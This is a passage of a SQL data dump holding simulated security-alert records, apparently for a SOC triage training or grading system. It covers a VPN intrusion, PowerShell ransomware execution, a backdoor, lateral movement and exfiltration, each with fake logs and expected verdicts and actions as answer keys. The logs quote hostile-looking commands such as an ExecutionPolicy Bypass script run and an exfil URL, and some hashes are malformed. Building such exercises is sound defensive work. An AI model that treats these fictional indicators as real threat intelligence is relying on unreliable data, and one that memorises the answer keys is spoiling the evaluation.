'beginner', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-15T20:58:15.578Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T15:48:32Z\\\",\\\"event_id\\\":\\\"dlp-2030\\\",\\\"source_ip\\\":\\\"192.168.1.45\\\",\\\"destination_ip\\\":\\\"45.67.89.123\\\",\\\"file_name\\\":\\\"confidential_data.zip\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"user\\\":\\\"jdoe\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"action\\\":\\\"allowed\\\",\\\"data_size\\\":\\\"2GB\\\",\\\"url\\\":\\\"https://malicious-site.com/exfil\\\"}\"},{\"timestamp\":\"2026-03-15T20:57:15.578Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T15:48:32Z\\\",\\\"event_id\\\":\\\"dlp-2030\\\",\\\"source_ip\\\":\\\"192.168.1.45\\\",\\\"destination_ip\\\":\\\"45.67.89.123\\\",\\\"file_name\\\":\\\"confidential_data.zip\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"user\\\":\\\"jdoe\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"action\\\":\\\"allowed\\\",\\\"data_size\\\":\\\"2GB\\\",\\\"url\\\":\\\"https://malicious-site.com/exfil\\\"}\"},{\"timestamp\":\"2026-03-15T20:56:15.578Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T15:48:32Z\\\",\\\"event_id\\\":\\\"dlp-2030\\\",\\\"source_ip\\\":\\\"192.168.1.45\\\",\\\"destination_ip\\\":\\\"45.67.89.123\\\",\\\"file_name\\\":\\\"confidential_data.zip\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"user\\\":\\\"jdoe\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"action\\\":\\\"allowed\\\",\\\"data_size\\\":\\\"2GB\\\",\\\"url\\\":\\\"https://malicious-site.com/exfil\\\"}\"},{\"timestamp\":\"2026-03-15T20:55:15.578Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T15:48:32Z\\\",\\\"event_id\\\":\\\"dlp-2030\\\",\\\"source_ip\\\":\\\"192.168.1.45\\\",\\\"destination_ip\\\":\\\"45.67.89.123\\\",\\\"file_name\\\":\\\"confidential_data.zip\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"user\\\":\\\"jdoe\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"action\\\":\\\"allowed\\\",\\\"data_size\\\":\\\"2GB\\\",\\\"url\\\":\\\"https://malicious-site.com/exfil\\\"}\"},{\"timestamp\":\"2026-03-15T20:54:15.578Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T15:48:32Z\\\",\\\"event_id\\\":\\\"dlp-2030\\\",\\\"source_ip\\\":\\\"192.168.1.45\\\",\\\"destination_ip\\\":\\\"45.67.89.123\\\",\\\"file_name\\\":\\\"confidential_data.zip\\\",\\\"file_hash\\\":\\\"d41d8cd98f00b204e9800998ecf8427e\\\",\\\"user\\\":\\\"jdoe\\\",\\\"protocol\\\":\\\"HTTPS\\\",\\\"action\\\":\\\"allowed\\\",\\\"data_size\\\":\\\"2GB\\\",\\\"url\\\":\\\"https://malicious-site.com/exfil\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1572, 'Suspicious VPN Login Attempt', 'high', 'VPN logs', 'An unauthorized login attempt was detected on a Cisco VPN endpoint. The attack was initiated by exploiting known vulnerabilities or using stolen credentials. The attacker IP is flagged as malicious in multiple threat intelligence sources.', 'Initial Access', 'T1078 - Valid Accounts', 1, 'new', NULL, '{\"timestamp\":\"2023-10-05T14:32:45Z\",\"event_id\":\"vpn-1234567\",\"vpn_endpoint\":\"vpn.corpnetwork.com\",\"user\":\"jdoe\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"10.0.0.5\",\"protocol\":\"IPSec\",\"login_status\":\"failed\",\"reason\":\"Invalid credentials\",\"vpn_software_version\":\"Cisco VPN Client 4.9\",\"hash\":\"e99a18c428cb38d5f260853678922e03\",\"malicious_flag\":true}', '2026-03-15 19:15:32', '2026-03-15 20:58:15', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"IP associated with multiple intrusion attempts and malicious activities.\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal User Directory\",\"verdict\":\"internal\",\"details\":\"Known user within the organization.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with known malware targeting Cisco VPN clients.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"block_ip\",\"reset_credentials\",\"collect_forensics\"]}', 'advanced', NULL, 1, 0, NULL, NULL, NULL, 
'{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-15T20:58:15.581Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:32:45Z\\\",\\\"event_id\\\":\\\"vpn-1234567\\\",\\\"vpn_endpoint\\\":\\\"vpn.corpnetwork.com\\\",\\\"user\\\":\\\"jdoe\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"10.0.0.5\\\",\\\"protocol\\\":\\\"IPSec\\\",\\\"login_status\\\":\\\"failed\\\",\\\"reason\\\":\\\"Invalid credentials\\\",\\\"vpn_software_version\\\":\\\"Cisco VPN Client 4.9\\\",\\\"hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"malicious_flag\\\":true}\"},{\"timestamp\":\"2026-03-15T20:57:15.581Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:32:45Z\\\",\\\"event_id\\\":\\\"vpn-1234567\\\",\\\"vpn_endpoint\\\":\\\"vpn.corpnetwork.com\\\",\\\"user\\\":\\\"jdoe\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"10.0.0.5\\\",\\\"protocol\\\":\\\"IPSec\\\",\\\"login_status\\\":\\\"failed\\\",\\\"reason\\\":\\\"Invalid credentials\\\",\\\"vpn_software_version\\\":\\\"Cisco VPN Client 4.9\\\",\\\"hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"malicious_flag\\\":true}\"},{\"timestamp\":\"2026-03-15T20:56:15.581Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 
2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:32:45Z\\\",\\\"event_id\\\":\\\"vpn-1234567\\\",\\\"vpn_endpoint\\\":\\\"vpn.corpnetwork.com\\\",\\\"user\\\":\\\"jdoe\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"10.0.0.5\\\",\\\"protocol\\\":\\\"IPSec\\\",\\\"login_status\\\":\\\"failed\\\",\\\"reason\\\":\\\"Invalid credentials\\\",\\\"vpn_software_version\\\":\\\"Cisco VPN Client 4.9\\\",\\\"hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"malicious_flag\\\":true}\"},{\"timestamp\":\"2026-03-15T20:55:15.581Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:32:45Z\\\",\\\"event_id\\\":\\\"vpn-1234567\\\",\\\"vpn_endpoint\\\":\\\"vpn.corpnetwork.com\\\",\\\"user\\\":\\\"jdoe\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"10.0.0.5\\\",\\\"protocol\\\":\\\"IPSec\\\",\\\"login_status\\\":\\\"failed\\\",\\\"reason\\\":\\\"Invalid credentials\\\",\\\"vpn_software_version\\\":\\\"Cisco VPN Client 4.9\\\",\\\"hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"malicious_flag\\\":true}\"},{\"timestamp\":\"2026-03-15T20:54:15.581Z\",\"source\":\"/var/log/auth.log\",\"event_code\":\"Failed\",\"message\":\"Failed password for invalid user admin from 192.168.1.50 port 49202 ssh2 [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-05T14:32:45Z\\\",\\\"event_id\\\":\\\"vpn-1234567\\\",\\\"vpn_endpoint\\\":\\\"vpn.corpnetwork.com\\\",\\\"user\\\":\\\"jdoe\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_ip\\\":\\\"10.0.0.5\\\",\\\"protocol\\\":\\\"IPSec\\\",\\\"login_status\\\":\\\"failed\\\",\\\"reason\\\":\\\"Invalid credentials\\\",\\\"vpn_software_version\\\":\\\"Cisco VPN Client 
4.9\\\",\\\"hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"malicious_flag\\\":true}\"}],\"query\":\"index=main source=\\\"/var/log/auth.log\\\" | head 100\"}}', 0),
(1573, 'Malicious Payload Execution Detected', 'critical', 'Endpoint detection and response (EDR) alerts', 'Following successful VPN compromise, the attackers execute a sophisticated ransomware payload, initiating their encryption process on the compromised endpoint.', 'Execution', 'T1059.001: Command and Scripting Interpreter: PowerShell', 1, 'new', NULL, '{\"timestamp\":\"2023-10-06T14:22:58Z\",\"event_id\":\"123456789\",\"event_type\":\"execution\",\"host\":{\"hostname\":\"compromised-host\",\"ip\":\"10.0.0.15\"},\"user\":{\"username\":\"jdoe\"},\"process\":{\"name\":\"powershell.exe\",\"command_line\":\"powershell.exe -NoProfile -ExecutionPolicy Bypass -File C:\\\\Users\\\\jdoe\\\\AppData\\\\Local\\\\Temp\\\\malicious_script.ps1\",\"hash\":\"3d2e4f5b6c9e10f11a12b13c14d15e16f17g18h19i1j20k21l2m22n2o23\"},\"network\":{\"source_ip\":\"10.0.0.15\",\"destination_ip\":\"203.0.113.45\",\"destination_port\":443},\"file\":{\"path\":\"C:\\\\Users\\\\jdoe\\\\AppData\\\\Local\\\\Temp\\\\malicious_script.ps1\",\"hash\":\"3d2e4f5b6c9e10f11a12b13c14d15e16f17g18h19i1j20k21l2m22n2o23\"}}', '2026-03-15 19:15:32', '2026-03-15 20:58:15', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.0.0.15\",\"is_critical\":true,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"internal\",\"details\":\"Internal network IP address\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"osint\",\"verdict\":\"malicious\",\"details\":\"Known malicious IP associated with ransomware campaigns\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"3d2e4f5b6c9e10f11a12b13c14d15e16f17g18h19i1j20k21l2m22n2o23\",\"is_critical\":true,\"osint_result\":{\"source\":\"osint\",\"verdict\":\"malicious\",\"details\":\"Hash associated with known ransomware 
payload\"}},{\"id\":\"artifact_4\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"internal\",\"verdict\":\"internal\",\"details\":\"Internal user account\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"collect_forensics\",\"escalate\"]}', 'advanced', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"EDR\",\"evidence\":{\"hostname\":\"WORKSTATION-01\",\"os\":\"Windows 10 Enterprise\",\"agent_version\":\"7.12.0\",\"process_tree\":[{\"id\":100,\"name\":\"explorer.exe\",\"pid\":4520,\"user\":\"jdoe\",\"cmd\":\"explorer.exe\",\"integrity\":\"Medium\",\"children\":[101]},{\"id\":101,\"name\":\"powershell.exe\",\"pid\":5100,\"user\":\"jdoe\",\"cmd\":\"powershell.exe -nop -enc AAB...\",\"integrity\":\"High\",\"children\":[102],\"highlight\":true},{\"id\":102,\"name\":\"conhost.exe\",\"pid\":5101,\"user\":\"jdoe\",\"cmd\":\"conhost.exe\",\"integrity\":\"High\",\"children\":[]}],\"network_connections\":[{\"pid\":5100,\"remote_ip\":\"203.0.113.55\",\"port\":443,\"state\":\"ESTABLISHED\",\"process\":\"powershell.exe\"}]}}', 0),
(1574, 'Creation of Persistent Backdoor', 'high', 'System integrity monitoring', 'The attackers installed a persistent backdoor on the compromised system to maintain access even if the primary route is detected and blocked. This action was identified through integrity monitoring, indicating manipulation of system files and unauthorized network communication.', 'Persistence', 'T1547 - Boot or Logon Autostart Execution', 1, 'new', NULL, '{\"timestamp\":\"2023-10-12T03:45:27Z\",\"host_ip\":\"192.168.1.103\",\"detected_file\":\"C:\\\\Windows\\\\System32\\\\svcbackdoor.exe\",\"file_hash\":\"e99a18c428cb38d5f260853678922e03\",\"user_account\":\"compromised_user\",\"process_id\":4567,\"action\":\"File creation and execution\",\"source_ip\":\"203.0.113.45\",\"destination_port\":443,\"protocol\":\"TCP\",\"log_type\":\"System Integrity\",\"alert_trigger\":\"Unusual file creation in critical directory\"}', '2026-03-15 19:15:32', '2026-03-15 20:58:15', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Platform\",\"verdict\":\"malicious\",\"details\":\"IP associated with known malicious activities and APT groups.\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash corresponds to a known backdoor executable used in multiple attacks.\"}},{\"id\":\"artifact_4\",\"type\":\"username\",\"value\":\"compromised_user\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Audit\",\"verdict\":\"internal\",\"details\":\"User account shows signs of unauthorized access.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True 
Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\"]}', 'advanced', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-15T20:58:15.590Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T03:45:27Z\\\",\\\"host_ip\\\":\\\"192.168.1.103\\\",\\\"detected_file\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\svcbackdoor.exe\\\",\\\"file_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"user_account\\\":\\\"compromised_user\\\",\\\"process_id\\\":4567,\\\"action\\\":\\\"File creation and execution\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_port\\\":443,\\\"protocol\\\":\\\"TCP\\\",\\\"log_type\\\":\\\"System Integrity\\\",\\\"alert_trigger\\\":\\\"Unusual file creation in critical directory\\\"}\"},{\"timestamp\":\"2026-03-15T20:57:15.590Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T03:45:27Z\\\",\\\"host_ip\\\":\\\"192.168.1.103\\\",\\\"detected_file\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\svcbackdoor.exe\\\",\\\"file_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"user_account\\\":\\\"compromised_user\\\",\\\"process_id\\\":4567,\\\"action\\\":\\\"File creation and execution\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_port\\\":443,\\\"protocol\\\":\\\"TCP\\\",\\\"log_type\\\":\\\"System Integrity\\\",\\\"alert_trigger\\\":\\\"Unusual file creation in critical directory\\\"}\"},{\"timestamp\":\"2026-03-15T20:56:15.590Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T03:45:27Z\\\",\\\"host_ip\\\":\\\"192.168.1.103\\\",\\\"detected_file\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\svcbackdoor.exe\\\",\\\"file_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"user_account\\\":\\\"compromised_user\\\",\\\"process_id\\\":4567,\\\"action\\\":\\\"File creation and execution\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_port\\\":443,\\\"protocol\\\":\\\"TCP\\\",\\\"log_type\\\":\\\"System Integrity\\\",\\\"alert_trigger\\\":\\\"Unusual file creation in critical directory\\\"}\"},{\"timestamp\":\"2026-03-15T20:55:15.590Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T03:45:27Z\\\",\\\"host_ip\\\":\\\"192.168.1.103\\\",\\\"detected_file\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\svcbackdoor.exe\\\",\\\"file_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"user_account\\\":\\\"compromised_user\\\",\\\"process_id\\\":4567,\\\"action\\\":\\\"File creation and execution\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_port\\\":443,\\\"protocol\\\":\\\"TCP\\\",\\\"log_type\\\":\\\"System Integrity\\\",\\\"alert_trigger\\\":\\\"Unusual file creation in critical directory\\\"}\"},{\"timestamp\":\"2026-03-15T20:54:15.590Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 4]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T03:45:27Z\\\",\\\"host_ip\\\":\\\"192.168.1.103\\\",\\\"detected_file\\\":\\\"C:\\\\\\\\Windows\\\\\\\\System32\\\\\\\\svcbackdoor.exe\\\",\\\"file_hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"user_account\\\":\\\"compromised_user\\\",\\\"process_id\\\":4567,\\\"action\\\":\\\"File creation and 
execution\\\",\\\"source_ip\\\":\\\"203.0.113.45\\\",\\\"destination_port\\\":443,\\\"protocol\\\":\\\"TCP\\\",\\\"log_type\\\":\\\"System Integrity\\\",\\\"alert_trigger\\\":\\\"Unusual file creation in critical directory\\\"}\"}],\"query\":\"index=main source=\\\"/var/log/syslog\\\" | head 100\"}}', 0),
(1575, 'Lateral Movement Across VMware ESXi Servers', 'high', 'Network traffic analysis', 'The attackers are utilizing their foothold to move laterally across the network, specifically targeting VMware ESXi servers to expand their access within the virtual environment. This is a sophisticated operation involving advanced techniques.', 'Lateral Movement', 'T1210', 1, 'new', NULL, '{\"timestamp\":\"2023-10-05T14:23:34Z\",\"source_ip\":\"203.0.113.45\",\"destination_ip\":\"10.0.5.12\",\"protocol\":\"TCP\",\"destination_port\":443,\"user_agent\":\"Mozilla/5.0 (Windows NT 10.0; Win64; x64)\",\"malware_hash\":\"9f86d081884c7d659a2feaa0c55ad015a3bf4f1b2b0b822cd15d6c15b0f00a08\",\"username\":\"esxi_admin\",\"filename\":\"vmtools_update.sh\",\"action\":\"login_attempt\",\"status\":\"success\",\"indicator\":\"APT38\"}', '2026-03-15 19:15:32', '2026-03-15 20:58:15', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"Known APT38 IP used in past lateral movement attacks.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.5.12\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Local VMware ESXi server.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"9f86d081884c7d659a2feaa0c55ad015a3bf4f1b2b0b822cd15d6c15b0f00a08\",\"is_critical\":true,\"osint_result\":{\"source\":\"Malware Database\",\"verdict\":\"malicious\",\"details\":\"Hash associated with known APT38 malware.\"}},{\"id\":\"artifact_4\",\"type\":\"username\",\"value\":\"esxi_admin\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Directory\",\"verdict\":\"internal\",\"details\":\"Privileged account targeted during 
attack.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"block_hash\",\"reset_credentials\",\"collect_forensics\",\"escalate\"]}', 'advanced', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"Firewall\",\"evidence\":{\"policy_name\":\"Block_Outbound_Direct_IP\",\"action\":\"ALLOW\",\"interface_in\":\"eth0\",\"interface_out\":\"eth1\",\"packets\":[{\"time\":\"10:00:01\",\"src\":\"10.0.0.5\",\"dst\":\"8.8.8.8\",\"proto\":\"UDP\",\"port\":53,\"size\":120,\"action\":\"ALLOW\"},{\"time\":\"10:00:02\",\"src\":\"10.0.0.5\",\"dst\":\"203.0.113.15\",\"proto\":\"TCP\",\"port\":443,\"size\":1500,\"action\":\"ALLOW\",\"alert\":true}]}}', 0),
(1576, 'Data Exfiltration to External Server', 'critical', 'Data loss prevention (DLP) systems', 'As a final step, the attackers exfiltrated critical data to an external server, preparing to leverage this information in their retro-styled leak site for extortion purposes. The DLP system detected a large volume of sensitive data being transferred to an unknown IP address.', 'Exfiltration', 'T1048.003 - Exfiltration Over Alternative Protocol: Exfiltration Over Unencrypted/Obfuscated Non-C2 ', 1, 'new', NULL, '{\"timestamp\":\"2023-10-12T14:32:00Z\",\"event_type\":\"data_exfiltration\",\"source_ip\":\"10.0.0.45\",\"destination_ip\":\"203.0.113.25\",\"destination_port\":443,\"protocol\":\"HTTPS\",\"user\":\"j.doe\",\"filename\":\"financial_report_2023.xlsx\",\"hash\":\"e99a18c428cb38d5f260853678922e03\",\"data_volume\":\"2GB\",\"alert_trigger\":\"DLP policy violation - Large data transfer to unknown IP\"}', '2026-03-15 19:15:32', '2026-03-15 20:58:15', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.25\",\"is_critical\":true,\"osint_result\":{\"source\":\"Threat Intelligence Feed\",\"verdict\":\"malicious\",\"details\":\"IP associated with known data exfiltration campaigns.\"}},{\"id\":\"artifact_2\",\"type\":\"filename\",\"value\":\"financial_report_2023.xlsx\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Database\",\"verdict\":\"internal\",\"details\":\"File contains sensitive financial information.\"}},{\"id\":\"artifact_3\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":false,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"clean\",\"details\":\"No known malware associated with this hash.\"}},{\"id\":\"artifact_4\",\"type\":\"username\",\"value\":\"j.doe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal User Directory\",\"verdict\":\"internal\",\"details\":\"Regular employee 
account.\"}}],\"recommended_actions\":[\"isolate_host\",\"block_ip\",\"reset_credentials\",\"collect_forensics\",\"escalate\"],\"expected_verdict\":\"True Positive\",\"expected_actions\":[\"isolate_host\",\"block_ip\",\"collect_forensics\",\"escalate\"]}', 'advanced', NULL, 1, 0, NULL, NULL, NULL, '{\"tool\":\"SIEM\",\"evidence\":{\"events\":[{\"timestamp\":\"2026-03-15T20:58:15.596Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:32:00Z\\\",\\\"event_type\\\":\\\"data_exfiltration\\\",\\\"source_ip\\\":\\\"10.0.0.45\\\",\\\"destination_ip\\\":\\\"203.0.113.25\\\",\\\"destination_port\\\":443,\\\"protocol\\\":\\\"HTTPS\\\",\\\"user\\\":\\\"j.doe\\\",\\\"filename\\\":\\\"financial_report_2023.xlsx\\\",\\\"hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"data_volume\\\":\\\"2GB\\\",\\\"alert_trigger\\\":\\\"DLP policy violation - Large data transfer to unknown IP\\\"}\"},{\"timestamp\":\"2026-03-15T20:57:15.596Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 1]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:32:00Z\\\",\\\"event_type\\\":\\\"data_exfiltration\\\",\\\"source_ip\\\":\\\"10.0.0.45\\\",\\\"destination_ip\\\":\\\"203.0.113.25\\\",\\\"destination_port\\\":443,\\\"protocol\\\":\\\"HTTPS\\\",\\\"user\\\":\\\"j.doe\\\",\\\"filename\\\":\\\"financial_report_2023.xlsx\\\",\\\"hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"data_volume\\\":\\\"2GB\\\",\\\"alert_trigger\\\":\\\"DLP policy violation - Large data transfer to unknown IP\\\"}\"},{\"timestamp\":\"2026-03-15T20:56:15.596Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 
2]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:32:00Z\\\",\\\"event_type\\\":\\\"data_exfiltration\\\",\\\"source_ip\\\":\\\"10.0.0.45\\\",\\\"destination_ip\\\":\\\"203.0.113.25\\\",\\\"destination_port\\\":443,\\\"protocol\\\":\\\"HTTPS\\\",\\\"user\\\":\\\"j.doe\\\",\\\"filename\\\":\\\"financial_report_2023.xlsx\\\",\\\"hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"data_volume\\\":\\\"2GB\\\",\\\"alert_trigger\\\":\\\"DLP policy violation - Large data transfer to unknown IP\\\"}\"},{\"timestamp\":\"2026-03-15T20:55:15.596Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 3]\",\"host\":\"PRODUCTION-SVR-01\",\"raw\":\"{\\\"timestamp\\\":\\\"2023-10-12T14:32:00Z\\\",\\\"event_type\\\":\\\"data_exfiltration\\\",\\\"source_ip\\\":\\\"10.0.0.45\\\",\\\"destination_ip\\\":\\\"203.0.113.25\\\",\\\"destination_port\\\":443,\\\"protocol\\\":\\\"HTTPS\\\",\\\"user\\\":\\\"j.doe\\\",\\\"filename\\\":\\\"financial_report_2023.xlsx\\\",\\\"hash\\\":\\\"e99a18c428cb38d5f260853678922e03\\\",\\\"data_volume\\\":\\\"2GB\\\",\\\"alert_trigger\\\":\\\"DLP policy violation - Large data transfer to unknown IP\\\"}\"},{\"timestamp\":\"2026-03-15T20:54:15.596Z\",\"source\":\"/var/log/syslog\",\"event_code\":\"INFO\",\"message\":\"System event detected [Repeated event count: 